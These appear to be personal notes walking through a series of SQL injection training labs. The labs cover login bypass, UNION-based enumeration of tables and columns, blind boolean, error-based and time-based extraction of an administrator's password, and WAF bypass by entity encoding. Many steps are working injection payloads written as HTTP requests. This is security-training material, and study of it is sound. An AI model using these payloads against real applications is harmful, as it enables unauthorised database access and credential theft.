labs

Retrieving hidden data

Lab - 1: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

GET /filter?category=Gifts'+OR+1%3d1-- HTTP/1.1

Subverting application logic

Lab - 2 : SQL injection vulnerability allowing login bypass

POST /login HTTP/1.1
...
csrf=1RBHY1YLKJyGP5nBXPAy4Xx7X2vznXr4&username=administrator%27--&password=safsf

UNION ATTACK

Lab - 3: SQL injection UNION attack, determining the number of columns returned by the query

GET /filter?category=Gifts'+ORDER+BY+4-- HTTP/1.1 will get an error and the numbers of returning columns must be 3.

GET /filter?category=Gifts'+UNION+SELECT+NULL,+NULL,+NULL+-- HTTP/1.1

Lab - 4: SQL injection UNION attack, finding a column containing text

GET /filter?category=Tech+gifts'+ORDER+BY+4-- HTTP/1.1 will get an error. GET /filter?category=Tech+gifts'+UNION+SELECT+'a',NULL,NULL-- will get an erorr.

Lab - 5: SQL injection UNION attack, retrieving data from other tables

  • The database contains a different table called users, with columns called username and password.

  • Repeat the steps from above labs then find that there are 2 columns returning both with text columns

Lab - 6: SQL injection UNION attack, retrieving multiple values in a single column

  • The database contains a different table called users, with columns called username and password.

  • Repeat the steps from above labs and find that there are 2 columns in which second is the text column

  • we need to extract 2 text columns, so

Examining the databases

Lab - 7: SQL injection attack, querying the database type and version on Oracle

  • Repeat the above step and find that there are 2 columns

  • In Oracle database UNION SELECT NULL,NULL doesn't work

  • Instead use UNION SELECT NULL, NULL FROM dual

  • Both are text columns

Lab - 8: SQL injection attack, querying the database type and version on MySQL and Microsoft

  • ' ORDER BY 2-- doesn't work

  • Instead use ' ORDER BY 2# for comment

Lab - 9: SQL injection attack, listing the database contents on non-Oracle databases

  • There are 2 string datatype columns

  • GET /filter?category=Gifts'+UNION+SELECT+TABLE_SCHEMA,TABLE_NAME+FROM+information_schema.tables-- HTTP/1.1 will get the name of the user table

table_name = 'users_xvzwev'

  • GET /filter?category=Gifts'+UNION+SELECT+COLUMN_NAME,DATA_TYPE+FROM+information_schema.columns+WHERE+table_name='users_xvzwev'-- HTTP/1.1

columns = password_otojxu , username_gfdqod

  • GET /filter?category=Gifts'+UNION+SELECT+password_otojxu,username_gfdqod+FROM+users_xvzwev-- HTTP/1.1

will get the administrator password

Lab - 10: SQL injection attack, listing the database contents on Oracle

  • There are 2 string datatype columns returned

  • GET /filter?category=Pets'+UNION+SELECT+TABLE_NAME,'b'+FROM+all_tables-- HTTP/1.1

table_name = USERS_MZGWOV

  • GET /filter?category=Pets'+UNION+SELECT+COLUMN_NAME,'b'+FROM+all_tab_columns+WHERE+table_name='USERS_MZGWOV'-- HTTP/1.1

column_names = PASSWORD_HQOOJT, USERNAME_HIHHBB

  • GET /filter?category=Pets'+UNION+SELECT+USERNAME_HIHHBB,+PASSWORD_HQOOJT+FROM+USERS_MZGWOV-- HTTP/1.1

  • In finding column names, single quote contains for table_name and no single quote for SELECT command

Blind SQL Injection

Lab - 11: Blind SQL injection with conditional responses

  • The database contains a different table called users, with columns called username and password

  • This lab is vulnerable at TrackingId

  • will not return the Welcome back message.

  • return the Welcome back message

  • check whether the table named users exists AND (select 'x' from users LIMIT 1)='x'--

  • check whether the username administrator exists AND (select username from users WHERE username='administrator')='administrator'--

  • enumerate length of password of administrator AND (select username from users WHERE username='administrator' AND LENGTH(password)>1)='administrator'--

    • test with 2,3,4,5,... and find the length of the password

  • find the administrator's password AND (select SUBSTRING(password,1,1) from users where username='administrator)='a'--

    • use cluster bomb from intruder for two position

    • first number inside SUBSTRING function until the length of the password

    • character ='a' with a-z1-9... etc

Lab - 12: Blind SQL injection with conditional errors

  • check the endpoints and not vulnerable to SQL injection except TrackingId

  • test with conditional responses and no differences

  • construct a subquery

    • '||(SELECT '')||'-- => will get an error and try with

    • '||(SELECT '' FROM dual)||'-- => return 200 and it is oracle database then check with other invalid table name

    • '||(SELECT '' FROM invalid_name)||'-- => return 500 error

  • check whether table name users exists

    • '||(SELECT '' FROM users WHERE ROWNUM = 1)||' => will not return an error and users table exists

  • then check with conditional errors

    will return no error but

    will return error 500

  • check username adminstrator exists

    If username='administrator' exists in users table CASE WHEN will run and will results an error. If doesn't exists will not run and will not get an error.

  • check the length of the password

  • substring the password

    • then use cluster bomb from burp intruder for 2 position

Lab - 13: Blind SQL injection with time delays

  • The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.

Lab - 14: Blind SQL injection with time delays and information retrieval

  • The database contains a different table called users, with columns called username and password.

  • Repeat above steps and found that it is PostgreSQL database and vulnerable to time delay injection at TrackingId parameter

  • Find the length of the password

and found that it has 19 characters

  • use intruder and find the password of the administrator

  • in intruder window, don't forget to select Response received column from Columns

Lab - 15: Blind SQL injection with out-of-band interaction

Lab - 16: Blind SQL injection with out-of-band data exfiltration

  • The database contains a different table called users, with columns called username and password

  • check in the Burp Collaborator

  • find the password of the administrator

Lab 17: SQL injection with filter bypass via XML encoding

  • This lab contains a SQL injection vulnerability in its stock check feature. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables.

  • The database contains a users table, which contains the usernames and passwords of registered users.

return

  • Then check the math operation

return 512 units

  • WAF is blocked an Attack detected

  • Install Hackvertor from BApp store

  • Select the SQL phrase that is injected and right clicked > extensions > hackvector > encode > dec_entities

  • Then send the request and error may not get

return

PreviousnotesNextcheat sheet

Last updated